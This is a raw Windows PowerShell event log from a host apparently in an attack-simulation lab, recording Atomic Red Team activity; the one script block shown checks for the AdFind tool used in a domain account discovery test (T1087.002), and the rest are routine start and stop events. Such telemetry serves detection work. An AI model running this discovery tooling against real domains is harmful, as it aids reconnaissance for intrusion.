ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478791
Keywords=None
Message=Started invocation of ScriptBlock ID: 5e0d8bf0-0d59-46ae-ba48-466746596727
Runspace ID: b1992ef2-481f-4eb9-a780-53254f41a29e
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4104
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Execute a Remote Command
OpCode=On create calls
RecordNumber=1478790
Keywords=None
Message=Creating Scriptblock text (1 of 1):
& {if (Test-Path C:\AtomicRedTeam\atomics\T1087.002\src\AdFind.exe) {exit 0} else {exit 1}}

ScriptBlock ID: 5e0d8bf0-0d59-46ae-ba48-466746596727
Path:
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40962
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Stop
RecordNumber=1478789
Keywords=None
Message=PowerShell console is ready for user input
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=53504
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Named Pipe IPC
OpCode=Open (async)
RecordNumber=1478788
Keywords=None
Message=Windows PowerShell has started an IPC listening thread on process: 6488 in AppDomain: DefaultAppDomain.
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=40961
EventType=4
Type=Information
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=PowerShell Console Startup
OpCode=Start
RecordNumber=1478787
Keywords=None
Message=PowerShell console is starting up
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478786
Keywords=None
Message=Started invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478785
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478784
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478783
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478782
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478781
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478780
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478779
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478778
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478777
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478776
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478775
Keywords=None
Message=Completed invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478774
Keywords=None
Message=Completed invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478773
Keywords=None
Message=Started invocation of ScriptBlock ID: 7e434dd3-d70d-47fd-bebf-987ac7eb8aab
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478772
Keywords=None
Message=Started invocation of ScriptBlock ID: 62c73b10-ce47-4819-a622-55e5c86121c9
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478771
Keywords=None
Message=Completed invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478770
Keywords=None
Message=Started invocation of ScriptBlock ID: 93d779ef-941d-4e00-98f9-278cc93e6e44
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478769
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478768
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478767
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478766
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478765
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478764
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478763
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478762
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478761
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478760
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478759
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478758
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478757
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478756
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478755
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478754
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478753
Keywords=None
Message=Completed invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478752
Keywords=None
Message=Completed invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478751
Keywords=None
Message=Started invocation of ScriptBlock ID: a94aafd9-20d5-4b97-804a-d64f984a7294
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478750
Keywords=None
Message=Completed invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478749
Keywords=None
Message=Started invocation of ScriptBlock ID: 5ee3323a-da1a-4e88-80c7-27401c836ac4
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478748
Keywords=None
Message=Completed invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478747
Keywords=None
Message=Completed invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478746
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478745
Keywords=None
Message=Started invocation of ScriptBlock ID: 9eb59db5-ed3e-41d3-9d04-6a88e40f3e61
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478744
Keywords=None
Message=Started invocation of ScriptBlock ID: 3a4f0322-8a1f-4935-b75b-7b1360c19530
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478743
Keywords=None
Message=Started invocation of ScriptBlock ID: b1ab4dc0-74ec-44f5-99a1-740f0f3055f2
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478742
Keywords=None
Message=Started invocation of ScriptBlock ID: a8e4500d-dea0-4c12-9b07-1211b99fa9eb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478741
Keywords=None
Message=Completed invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478740
Keywords=None
Message=Started invocation of ScriptBlock ID: 18112540-b6c5-4351-8b4f-3433ca6f80bb
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478739
Keywords=None
Message=Completed invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1478738
Keywords=None
Message=Started invocation of ScriptBlock ID: d8b2c5a7-15db-4656-8a13-36c4cff94b52
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478737
Keywords=None
Message=Completed invocation of ScriptBlock ID: 1ef9c228-b78e-4897-b91e-9c995c7fd3bc
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:06:19 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1478736
Keywords=None
Message=Completed invocation of ScriptBlock ID: b6cc795c-e37b-4d73-8dc4-a4bc01fa13ee
Runspace ID: 0a0df633-77db-48df-92b0-f70916f4e560
06/15/2021 05:06:19 PM
